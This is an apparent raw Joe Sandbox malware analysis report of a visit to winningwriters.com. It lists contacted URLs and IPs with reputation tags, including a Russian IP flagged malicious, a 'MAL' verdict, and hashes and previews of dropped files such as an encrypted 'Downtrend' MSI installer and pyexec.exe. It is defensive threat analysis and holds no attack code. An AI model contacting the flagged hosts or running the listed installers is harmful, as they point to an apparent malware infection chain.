                                                                                                https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960063857&cd[buttonFeatures]=%7B%22classList%22%3A%22button%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22fixItBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Fix%20it%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Fix%20it&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=1&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=FGETfalse
                                                                                                  high
                                                                                                  https://static.ads-twitter.com/uwt.jsfalse
                                                                                                    high
                                                                                                    https://winningwriters.com/assets/images/logo@2x.pngfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://winningwriters.com/assets/images/search.pngfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://winningwriters.com/assets/images/slidecontrols.pngfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://winningwriters.com//assets/images/insta_heart.pngfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.facebook.com/tr/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960090650&cd[buttonFeatures]=%7B%22classList%22%3A%22button%20active%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22doneBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Done%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Done&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=2&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=GETfalse
                                                                                                      high
                                                                                                      https://winningwriters.com/assets/js/hoverintent.jsfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://winningwriters.com/graphics/wergle/garnham_home_page_slide_a.jpgfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://winningwriters.com/graphics/tomstory/mcnamara_home_page_slide.jpgfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://winningwriters.com/assets/fancybox/jquery.fancybox.pack.jsfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://winningwriters.com/assets/images/lion-mobile.pngfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://winningwriters.com/graphics/advertising/origin_story_banner_for_ww_2408.jpgfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://connect.facebook.net/signals/config/188856481728275?v=2.9.177&r=stable&domain=winningwriters.com&hme=c3e4904c1dde42d643265ef909b9e193c41cedcd6f559a3ff5e1b178e36647fa&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113false
                                                                                                        high
                                                                                                        https://winningwriters.com/graphics/wergle/wergle_2024_top_banner_970_250.jpgfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://winningwriters.com/false
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://winningwriters.com/graphics/tomstory/liu_home_page_slide.jpgfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://winningwriters.com/assets/images/social-sprite-2020.pngfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://winningwriters.com/assets/js/jquery.matchHeight-min.jsfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://winningwriters.com/assets/fancybox/fancybox_sprite.pngfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://winningwriters.com/assets/js/device.min.jsfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://winningwriters.com/graphics/home_page_slide_victor.jpgfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://winningwriters.com/assets/js/feed.jsfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://www.facebook.com/tr/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960063857&cd[buttonFeatures]=%7B%22classList%22%3A%22button%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22fixItBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Fix%20it%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Fix%20it&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=1&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=GETfalse
                                                                                                          high
                                                                                                          https://winningwriters.com/assets/images/winningwriters.icofalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://winningwriters.com/assets/css/responsive-nav-styles.cssfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://winningwriters.com/assets/js/responsiveslides.jsfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://code.jquery.com/jquery-migrate-1.2.1.jsfalse
                                                                                                            high
                                                                                                            https://winningwriters.com/assets/fancybox/fancybox_overlay.pngfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://winningwriters.com/assets/fancybox/jquery.fancybox.cssfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://t.co/i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=e1e54de9-06c4-4a40-9102-eec93f94572b&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=580bb215-95ae-413b-b0c8-e4ee476adf13&tw_document_href=https%3A%2F%2Fwinningwriters.com%2F&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o49bc&type=javascript&version=2.3.31false
                                                                                                              high
                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                              http://www.vmware.com/0pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.softwareok.com/?Freeware/Find.Same.Images.OK/Historycmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drfalse
                                                                                                                    high
                                                                                                                    https://github.com/carhartl/jquery-cookiechromecache_281.1.drfalse
                                                                                                                      high
                                                                                                                      http://www.softwareok.com/?Freeware/Find.Same.Images.OKcmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://ampcid.google.com/v1/publisher:getClientIdchromecache_279.1.drfalse
                                                                                                                          high
                                                                                                                          https://www.google.comchromecache_212.1.drfalse
                                                                                                                            high
                                                                                                                            http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.softwareok.depyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.softwareok.de/?Freeware/Find.Same.Images.OK/Historycmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://ns.attribution.com/ads/1.0/chromecache_181.1.dr, chromecache_191.1.dr, chromecache_239.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://stats.g.doubleclick.net/j/collectchromecache_279.1.drfalse
                                                                                                                                      high
                                                                                                                                      http://www.softwareok.com/?Download=Find.Same.Images.OKcmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.softwareok.de/?Download=Find.Same.Images.OKcmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.google.com/pagead/1p-user-list/1072733940/?randomchromecache_198.1.dr, chromecache_224.1.dr, chromecache_265.1.dr, chromecache_255.1.dr, chromecache_257.1.dr, chromecache_199.1.dr, chromecache_217.1.dr, chromecache_197.1.dr, chromecache_303.1.dr, chromecache_344.1.dr, chromecache_296.1.drfalse
                                                                                                                                            high
                                                                                                                                            http://responsive-nav.comchromecache_313.1.dr, chromecache_192.1.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.symauth.com/cps0(pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://cct.google/taggy/agent.jschromecache_247.1.dr, chromecache_207.1.dr, chromecache_212.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://connect.facebook.net/chromecache_326.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/viljamis/responsive-nav.jschromecache_313.1.dr, chromecache_192.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.google.%/ads/ga-audienceschromecache_279.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.symauth.com/rpa00pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.info-zip.org/pyexec.exe, 00000015.00000002.2069622141.0000000003514000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.00000000053FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://ocsp.sectigo.com0pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drfalse
                                                                                                                                                            high
                                                                                                                                                            http://brm.io/jquery-match-height/chromecache_202.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drfalse
                                                                                                                                                                high
                                                                                                                                                                http://www.softwareok.de/?Freeware/Find.Same.Images.OKcmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://python.org/dev/peps/pep-0263/python27.dll.21.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://sectigo.com/CPS0pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#pyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://responsiveslides.comchromecache_268.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.vmware.com/0/pyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://googleads.g.doubleclick.netchromecache_212.1.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://tagassistant.google.com/chromecache_279.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://www.???.xx/?search=%spyexec.exe, 00000015.00000002.2069622141.000000000356A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000017.00000002.2201249790.0000000005448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://www.thecssninja.com/javascript/handleeventchromecache_313.1.dr, chromecache_192.1.drfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://viljamis.comchromecache_268.1.drfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypyexec.exe, 00000015.00000002.2065227864.0000000000515000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe.20.dr, pyexec.exe.21.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.google.com/ads/ga-audienceschromecache_279.1.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://td.doubleclick.netchromecache_247.1.dr, chromecache_207.1.dr, chromecache_212.1.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://connect.facebook.net/log/fbevents_telemetry/chromecache_326.1.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                            173.194.76.157
                                                                                                                                                                                            stats.g.doubleclick.netUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            216.239.34.181
                                                                                                                                                                                            analytics-alv.google.comUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            103.52.144.214
                                                                                                                                                                                            cta.berlmember.comIndonesia
                                                                                                                                                                                            59147IDNIC-DRUPADI-AS-IDPTDrupadiPrimaIDfalse
                                                                                                                                                                                            151.101.193.140
                                                                                                                                                                                            dualstack.reddit.map.fastly.netUnited States
                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                            151.101.65.140
                                                                                                                                                                                            reddit.map.fastly.netUnited States
                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                            151.101.66.137
                                                                                                                                                                                            code.jquery.comUnited States
                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                            193.188.22.73
                                                                                                                                                                                            unknownRussian Federation
                                                                                                                                                                                            49558LIVECOMM-ASRespublikanskayastr3k6RUtrue
                                                                                                                                                                                            162.159.140.229
                                                                                                                                                                                            t.coUnited States
                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            142.250.186.34
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            66.33.207.42
                                                                                                                                                                                            winningwriters.comUnited States
                                                                                                                                                                                            26347DREAMHOST-ASUSfalse
                                                                                                                                                                                            157.240.0.35
                                                                                                                                                                                            star-mini.c10r.facebook.comUnited States
                                                                                                                                                                                            32934FACEBOOKUSfalse
                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                            unknownReserved
                                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                                            188.114.97.3
                                                                                                                                                                                            bcbshieldn.comEuropean Union
                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            142.250.185.194
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            146.75.120.157
                                                                                                                                                                                            platform.twitter.map.fastly.netSweden
                                                                                                                                                                                            30051SCCGOVUSfalse
                                                                                                                                                                                            157.240.249.63
                                                                                                                                                                                            scontent-ord5-1.cdninstagram.comUnited States
                                                                                                                                                                                            32934FACEBOOKUSfalse
                                                                                                                                                                                            157.240.253.35
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            32934FACEBOOKUSfalse
                                                                                                                                                                                            157.240.0.6
                                                                                                                                                                                            scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                            32934FACEBOOKUSfalse
                                                                                                                                                                                            74.125.206.157
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            94.141.120.12
                                                                                                                                                                                            premiumserviceads.comRussian Federation
                                                                                                                                                                                            43429UNITLINE_RST_NET1RostovnaDonuRUfalse
                                                                                                                                                                                            142.250.185.164
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            142.250.186.132
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            157.240.252.35
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            32934FACEBOOKUSfalse
                                                                                                                                                                                            142.250.186.162
                                                                                                                                                                                            googleads.g.doubleclick.netUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            104.244.42.67
                                                                                                                                                                                            s.twitter.comUnited States
                                                                                                                                                                                            13414TWITTERUSfalse
                                                                                                                                                                                            151.101.1.140
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                            151.101.2.137
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                            142.250.185.130
                                                                                                                                                                                            td.doubleclick.netUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            142.250.185.174
                                                                                                                                                                                            analytics.google.comUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            188.114.96.3
                                                                                                                                                                                            unknownEuropean Union
                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                            151.101.129.140
                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                            172.217.16.132
                                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                            IP
                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                            192.168.2.16
                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                            Analysis ID:1557996
                                                                                                                                                                                            Start date and time:2024-11-18 20:59:31 +01:00
                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                            Overall analysis duration:0h 4m 55s
                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                            Report type:full
                                                                                                                                                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                            Sample URL:http://winningwriters.com
                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                            Number of analysed new started processes analysed:30
                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                            Number of injected processes analysed:1
                                                                                                                                                                                            Technologies:
                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                            Classification:mal76.expl.evad.win@43/305@90/34
                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 216.58.212.131, 142.250.186.46, 64.233.184.84, 34.104.35.123, 142.250.181.234, 142.250.185.99, 217.20.57.35, 216.58.206.72, 2.19.225.248, 142.250.186.106, 142.250.185.200, 142.250.186.40, 172.217.18.14, 142.250.185.110, 142.250.74.202, 142.250.186.42, 172.217.18.10, 142.250.185.170, 142.250.185.74, 142.250.185.202, 142.250.185.106, 216.58.206.42, 142.250.186.138, 142.250.184.202, 142.250.186.74, 142.250.185.234, 142.250.185.138, 172.217.16.202, 216.58.206.35, 142.250.186.110, 142.250.184.200
                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): bx-ring.msedge.net, clients1.google.com, fonts.googleapis.com, ds-s7.addthis.com.edgekey.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ajax.googleapis.com, e4016.a.akamaiedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, osa23prdapp02-canary.netmon.azure.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, login.live.com, www.googletagmanager.com, update.googleapis.com, clients.l.google.com, www.google-analytics.com
                                                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                            • VT rate limit hit for: http://winningwriters.com
                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                            15:01:15API Interceptor45x Sleep call for process: powershell.exe modified
                                                                                                                                                                                            15:02:00API Interceptor1x Sleep call for process: cmd.exe modified
                                                                                                                                                                                            No context
                                                                                                                                                                                            No context
                                                                                                                                                                                            No context
                                                                                                                                                                                            No context
                                                                                                                                                                                            No context
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8853
                                                                                                                                                                                            Entropy (8bit):5.621615666217662
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:q5PJrU32QaRegMX8UtRCsThqZUtRC6jk4eWThq9HHjfnewibicDIZC1pgBCRNe7j:qh3XRebbtkIrtk0BS81pQ
                                                                                                                                                                                            MD5:BEB434EC4E4885EFF24E10D262EB7F52
                                                                                                                                                                                            SHA1:D14A2475D14EBEF82758B5F27D3352A51E50DEFC
                                                                                                                                                                                            SHA-256:CADC1B1221725602008117C1951F1D6276F6E80B91E63EC50BB95E9358646AE7
                                                                                                                                                                                            SHA-512:8E6CD770E88A6B1A5B7DA024D8302C6DBAD0A27DD80E6BC60012A9BE0614039D380200CB925537FAFB8B9CB078BC6C4253D06ADA88B10A07C1ECB0E49021B4BF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:...@IXOS.@.....@-xrY.@.....@.....@.....@.....@.....@......&.{B7427398-E4B0-4576-85DB-A59FEFF250F5}..Downtrend..2as.msi.@.....@.....@.....@........&.{B840F713-1596-48FF-B592-EB5BD9C36D7F}.....@.....@.....@.....@.......@.....@.....@.......@......Downtrend......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{7660FA3B-7429-51F7-9F6A-116CC6E0E62D}&.{B7427398-E4B0-4576-85DB-A59FEFF250F5}.@......&.{CCACA375-1BE6-5B9A-9B2A-16646AB91A0E}&.{B7427398-E4B0-4576-85DB-A59FEFF250F5}.@......&.{DB39D6C4-3238-5718-8833-EFB6BB73BAE1}&.{B7427398-E4B0-4576-85DB-A59FEFF250F5}.@......&.{CE19E3B5-5BFF-5FE3-ACE8-9B74335B97DE}&.{B7427398-E4B0-4576-85DB-A59FEFF250F5}.@......&.{C4F3EAF2-7D0E-56E1-92CC-92B5CF9CDC9C}&.{B7427398-E4B0-4576-85DB-A59FEFF250F5}.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..%.C:\Users\user\AppData\Local\Initiate\....*.C:\Users\user\AppData\Local\Initiate\hv
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Downtrend, Author: Bandelet Huddle, Keywords: Installer, Comments: This installer database contains the logic and data required to install Downtrend., Template: Intel;1033, Revision Number: {B840F713-1596-48FF-B592-EB5BD9C36D7F}, Create Time/Date: Sat Nov 16 14:40:28 2024, Last Saved Time/Date: Sat Nov 16 14:40:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5402624
                                                                                                                                                                                            Entropy (8bit):7.99727796639253
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:98304:DwSdWnJMm46Z1K6u2/4xcjmAMHwnERXq82isnGEhxqQYh531dVnIEep:DEJM3Y4/A86Ex+ZgQY3zVnIt
                                                                                                                                                                                            MD5:66E841A153D0E6124D6DDBC9148B85F2
                                                                                                                                                                                            SHA1:F7A18EA89EB6B71F943DDFD99CB0B67D5ACE6B77
                                                                                                                                                                                            SHA-256:163CFCB8A2C2E14CB77E0D735B87F56AE653D58AD5C69C536396F2936AFD1C72
                                                                                                                                                                                            SHA-512:FF58FACFCB8C18573683C94B3B830ACCA16E246247DE5DEAD61E66E19774D5BB8DCFE7A47BA7C65E8F20BA1306DEE42B85A5E34C462F8559B73BE88CF363F4CD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4477609
                                                                                                                                                                                            Entropy (8bit):7.956413661722573
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:qN9Xj3JnYcc1qyA4c1As8F+5wB+du0CYPIpMhlkXH4UCZxeFH:qbJnYx1qnF3gQlPNlkXpH
                                                                                                                                                                                            MD5:AD4C307776E72FA5AA6B9FA8D5DB4E3D
                                                                                                                                                                                            SHA1:CD7FB1BB46069217F41AA3F8B81EBB1A7D056BF4
                                                                                                                                                                                            SHA-256:C1DC82830A8892984E84EF135FB12332DE709BF6DDD2D712889CE00A5409BF30
